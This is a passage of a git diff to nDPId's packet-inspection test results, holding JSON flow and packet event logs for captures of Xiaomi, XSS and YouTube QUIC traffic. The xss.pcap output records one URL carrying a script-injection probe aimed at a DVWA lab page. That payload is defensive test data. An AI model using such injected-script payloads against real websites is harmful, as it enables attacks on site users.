+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649839944752,"flow_last_seen":1649839944782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649839944782,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625846975,"flow_last_seen":1643625847231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":928,"flow_tot_l4_payload_len":1284,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.244.219","src_port":5222,"dst_port":45904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1643625858130,"flow_last_seen":1643625858384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"97.39.119.172","dst_ip":"192.168.93.59","src_port":5222,"dst_port":51488,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1643625848421,"flow_last_seen":1643625997739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":914,"flow_tot_l4_payload_len":1269,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1649839946492,"l3_proto":"ip4","src_ip":"115.164.74.232","dst_ip":"192.168.247.13","src_port":5222,"dst_port":38018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":34,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":34,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":5525,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1649853179269} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649853179269,"flow_last_seen":1649853179269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1649853179269,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1649853179269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649853179269,"pkt":"eJS0JASgYDjgxTWgCABFAAA82XxAAD8GovfAqAJkEsHperAyFGbKjahPAAAAAKAC\/\/8SCgAAAgQFtAQCCAp5z8VmAAAAAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1649853179291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649853179291,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAPUGxnMSwel6wKgCZBRmsDIvdwKjyo2oUKASaN9j8wAAAgQFrAQCCAqcy3ZJec\/FZgEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1649853179293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1649853179293,"pkt":"eJS0JASgYDjgxTWgCABFAAA02X1AAD8Gov7AqAJkEsHperAyFGbKjahQL3cCpIAQAKz61AAAAQEICnnPxX2cy3ZJ"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649853179269,"flow_last_seen":1649853179315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1649853179315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649839944752,"flow_last_seen":1649840399901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":933,"flow_tot_l4_payload_len":1618,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1649853179854,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1649853179269,"flow_last_seen":1649853179315,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1649853179315,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":48,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649839944752,"flow_last_seen":1649840399901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":933,"flow_tot_l4_payload_len":1618,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1649853179854,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"3.127.176.74","src_port":37708,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":49,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":49,"packets-processed":48,"total-skipped-flows":0,"total-l4-payload-len":7643,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":1650283578710} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650283578710,"flow_last_seen":1650283578710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650283578710,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1650283578710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1650283578710,"pkt":"eJS0JASgYDjgxTWgCABFAAA8DvVAAD8GnQ7AqAJky2sBQb46AFChwP+pAAAAAKAC\/\/8meQAAAgQFtAQCCArLcGZmAAAAAAEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1650283579013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650283579013,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAACkGwgvLawFBwKgCZABQvjrJa8kHocD\/qoASchB61gAAAgQFrAEBBAIBAwMH"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1650283579202,"pkt":"eJS0JASgYDjgxTWgCABFAAAoDvZAAD8GnSHAqAJky2sBQb46AFChwP+qyWvJCFAQAKwtBQAA"} -01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650283578710,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":348,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"203.107.1.65","url":"203.107.1.65\/164566\/sign_d?host=appmarket.micloud.xiaomi.net&sdk=android_1.3.3&t=1650284179&s=762f2c07cf9262c61753f45b4117c232&sid=jccM7PF4XY0T&net=wifi&bssid=02%3A00%3A00%3A00%3A00%3A00","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 10; Redmi Note 9 Pro MIUI\/V12.0.3.0.QJZMIXM)"}} +01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650283578710,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":348,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"203.107.1.65","url":"203.107.1.65\/164566\/sign_d?host=appmarket.micloud.xiaomi.net&sdk=android_1.3.3&t=1650284179&s=762f2c07cf9262c61753f45b4117c232&sid=jccM7PF4XY0T&net=wifi&bssid=02%3A00%3A00%3A00%3A00%3A00","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 10; Redmi Note 9 Pro MIUI\/V12.0.3.0.QJZMIXM)"}} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650283578710,"flow_last_seen":1650283579202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":348,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"203.107.1.65","src_port":48698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649853179269,"flow_last_seen":1649853538407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":948,"flow_tot_l4_payload_len":2118,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649853179269,"flow_last_seen":1649853538407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":948,"flow_tot_l4_payload_len":2118,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1650283579202,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"18.193.233.122","src_port":45106,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Xiaomi","breed":"Acceptable","category":"Web"}} 
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":52,"source":"xiaomi.pcap","alias":"nDPId-test","packets-captured":52,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":7991,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1650283579202} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 52/52 @@ -53,9 +53,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5889953 bytes -~~ total memory freed........: 5889953 bytes -~~ total allocations/frees...: 118204/118204 +~~ total memory allocated....: 6023587 bytes +~~ total memory freed........: 6023587 bytes +~~ total allocations/frees...: 120966/120966 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 1126 chars diff --git a/test/results/xss.pcap.out b/test/results/xss.pcap.out index 3b1ab2152..7146d32ae 100644 --- a/test/results/xss.pcap.out +++ b/test/results/xss.pcap.out 
@@ -8,8 +8,8 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655243489609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655243489609,"pkt":"4CvpcxhCFE+Kc3lPCABFAAA8AABAAEAGspPAqANrwKgDbQBQ0QwZ0GKdt6Q9NKAS\/oiGuQAAAgQFtAQCCAqztRhGkEebngEDAwc="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655243489614,"pkt":"FE+Kc3lP4CvpcxhCCABFAAA0\/4hAAEAGsxLAqANtwKgDa9EMAFC3pD00GdBinoAQAfayEgAAAQEICpBHm6SztRhG"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655243489614,"pkt":"FE+Kc3lP4CvpcxhCCABFAAA0+yNAAEAGt3fAqANtwKgDa9EKAFDSR62yZEbVlYAQAfZphQAAAQEICpBHm6SztRhG"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":608,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1655243489614,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/xss_d\/?default=English%3Cscript%3Ealert(1)%3C\/script%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655243489609,"flow_last_seen":1655243489620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2451,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":608,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1655243489614,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/xss_d\/?default=English%3Cscript%3Ealert(1)%3C\/script%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655243489609,"flow_last_seen":1655243489620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2451,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1655243489609,"flow_last_seen":1655243489614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655243489620,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11,"source":"xss.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":11,"total-skipped-flows":0,"total-l4-payload-len":2451,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1655243489620} @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871070 bytes -~~ total memory freed........: 5871070 bytes -~~ total allocations/frees...: 118134/118134 +~~ total memory allocated....: 6004704 bytes +~~ total memory freed........: 6004704 bytes +~~ total allocations/frees...: 120896/120896 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1059 chars diff --git a/test/results/youtube_quic.pcap.out b/test/results/youtube_quic.pcap.out index 813e8d4f6..6747fe2b8 100644 --- a/test/results/youtube_quic.pcap.out +++ b/test/results/youtube_quic.pcap.out 
@@ -2,22 +2,22 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1489363823466} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1489363823466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823466,"pkt":"gCqojWksxCwDBkn+CABFAAViKp8AAEARAADAqAEH2DrNQtbVAbsFTmyMDZNw4V58RG0IUTAzNQHEx\/Yat8K2lJx\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\/QkmmE3zDBRwXexEviTXtQHZlZT\/o0M3FJ3WOBZp5lL5RXIaTAX\/iszgW7Ui51EwMzUB6IFgkpIa6H7tgIaiFYKRWMXjbzAwMDAwMDAwAGp0dp4RQa9ev39thoVizX7vQxRkAAAAQ0MyMGJldGEgQ2hyb21lLzU3LjAuMjk4Ny45OCBJbnRlbCBNYWMgT1MgWCAxMF8xMl8za3Zj9RsCsgRL78LWSY4+jwAAAABYNTA5AAAQAAEAAAAeAAAAb+PFWAAAAABoJX9SS1LMMIZlh9cGt32w74KlkbfLCJvYbB6phUnjYtV\/J7+3T+WICkKGmxl0apInEplRSWcqg\/3qI+CqJwNXZAAAAAEAAABDMjU1HvdI4XZwU8Me90jhdnBTwz2t9HxBefiRQAt7kKmuees2jgEAnGVpdpNkhQuOQ0r1tyTPo1k8IEM71wOV+MDwud\/WmN8O\/bZt8M5S76zS6GQgUAsZfJUzhYMLh2DzCj0s2UxZDpdWlDQ\/KBiEO80tVmE+bGp5czdFQGnhi\/134fgolaoUotcrvEChNXZdSQ7ze+ZsVxVgDQIPLJn5KItVO0bNTbdFJlK9ck\/6gUes9AlK+Lowm7raNBTPfJpo34tpsNA3toSRqnAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA